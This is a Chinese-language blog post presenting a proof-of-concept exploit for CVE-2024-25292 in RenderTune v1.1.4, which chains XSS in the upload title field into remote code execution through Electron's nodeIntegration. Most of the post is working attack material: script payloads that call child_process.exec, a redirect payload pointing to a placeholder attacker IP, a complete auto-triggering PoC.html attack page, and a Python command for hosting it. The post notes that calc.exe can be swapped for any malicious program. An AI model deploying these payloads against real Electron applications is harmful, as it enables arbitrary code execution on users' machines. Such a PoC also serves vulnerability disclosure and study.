RenderTune RCE 漏洞利用演示 - XSS到远程代码执行

用户5191495848452026-04-11 10:53

RenderTune RCE - CVE-2024-25292 漏洞概念验证

本项目是针对 CVE-2024-25292 漏洞的概念验证(Proof-of-Concept)。该漏洞存在于 RenderTune v1.1.4 中,允许攻击者通过构造恶意负载注入到"上传标题"(Upload Title)参数,从而执行任意 Web 脚本或 HTML 代码,并进一步利用 Electron 框架的配置缺陷实现远程代码执行(RCE)。

功能特性

  • XSS 漏洞利用:演示如何通过 Markdown 链接或脚本标签在标题字段注入恶意代码
  • RCE 实现 :利用 Electron 中 nodeIntegration 开启的配置,通过 Node.js 子进程执行系统命令
  • 攻击服务器模拟:提供完整的攻击页面代码,可部署于攻击者服务器进行自动化利用
  • 自动触发机制:页面加载时自动执行恶意代码,无需用户点击交互

安装指南

本项目为漏洞演示代码,无需安装额外依赖。运行攻击服务器需要 Python 环境。

系统要求

  • Python 3.x(用于启动简易 HTTP 服务器)
  • 现代浏览器(用于访问攻击页面)
  • 目标环境:RenderTune v1.1.4 或 nteract 0.28.0(存在漏洞的版本)

启动攻击服务器

bash 复制代码 
# 在存放 PoC.html 的目录下执行
python -m http.server 80

使用说明

漏洞利用步骤

场景一:XSS 到 RCE

步骤 1:确认标题部分存在 XSS 漏洞(需同时上传图片文件才能注册项目)

html 复制代码 
<b>jruru</b>

步骤 2:使用 XSS 执行 Node.js 系统命令

html 复制代码 
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>
场景二:通过攻击者服务器进行攻击

当应用每次运行时,使用 window.location 自动跳转到攻击者控制的页面。

html 复制代码 
<script>window.location='http://[attacker IP]/PoC.html'</script>

完整攻击页面代码

将以下内容保存为 PoC.html,放置在攻击服务器的 Web 根目录下:

html 复制代码 
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>

核心代码

漏洞利用核心 - 自动执行 RCE

以下代码演示了页面加载后自动通过 Electron 的 shell 模块打开系统计算器,实现远程代码执行:

javascript 复制代码 
// 利用 Electron 的 nodeIntegration 特性,直接调用 Node.js 模块
function openExternal() {
  try {
    // 从 Electron 中解构 shell 模块
    const { shell } = require('electron');
    // 打开系统文件路径,实际可替换为任意恶意程序路径
    shell.openExternal('file:C:/Windows/System32/calc.exe');
  } catch(e) {
    alert('JRURU');
    alert(e);
  }
}

// 页面加载完成后自动触发,无需用户交互
document.addEventListener('DOMContentLoaded', function() {
  openExternal();
});

XSS 注入载荷示例

html 复制代码 
<!-- 基础 XSS 验证 -->
<b>jruru</b>

<!-- 执行 Node.js 命令的 XSS 载荷 -->
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

<!-- 重定向到攻击者服务器的载荷 -->
<script>window.location='http://[attacker IP]/PoC.html'</script>

漏洞利用原理

  1. RenderTune v1.1.4 在处理 Markdown 链接时,会创建 Electron WebView
  2. WebView 配置中 nodeIntegration 被设置为 true,允许在渲染进程中访问 Node.js API
  3. 攻击者通过 XSS 注入脚本,调用 require('child_process').exec()require('electron').shell.openExternal()
  4. 成功实现从 XSS 到 RCE 的完整攻击链 6HFtX5dABrKlqXeO5PUv/w4WElzZ7wu3Vcpj0XEsVLE=
相关推荐
郑寿昌3 分钟前
2026脑机接口与大模型融合架构解析
大数据·人工智能·架构
这是谁的博客?3 分钟前
AI 领域精选新闻(2026-05-24)
人工智能·ai·大模型·agent·ai安全
万少3 分钟前
万少的 Claude Code 入门教程
前端·人工智能·后端
SP FA4 分钟前
深度强化学习与控制(二):无模型强化学习
人工智能·强化学习·dqn
蓦然回首却已人去楼空5 分钟前
深度学习进阶:自然语言处理|4.2.3 QA|交叉熵、激活函数与 y − t:一套数学框架的三个侧面
人工智能·深度学习·自然语言处理
malog_6 分钟前
Milvus向量数据库:AI时代的搜索革命
数据库·人工智能·后端·milvus
lizhihai_9912 分钟前
股市学习心得-技术指标学习(布林线+MACD)
大数据·人工智能·学习
徐安安_ye114 分钟前
FlashAttention遇上旋转位置编码:RoPE是怎么跟注意力计算配合的?
人工智能·深度学习·机器学习
qq_4112624222 分钟前
Minimax WebSocket TTS 文档里 bitrate / sample_rate 的真实取值
人工智能
嗝o゚22 分钟前
昇腾CANN elec-ops-inspection 仓:电力巡检AI算子实战
人工智能·cann·电力巡检
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法04CC-Switch & Claude 基于 Linux 服务器安装使用指南05【AI】2026 年具身智能模型和世界模型总结06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07Codegraph 实战:用知识图谱让 AI 编程效率翻倍08几个好用的ip纯净度检测网站09装上就回不去了:CodeGraph 让 AI 编程效率飙升 92%,它到底做了什么?10Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)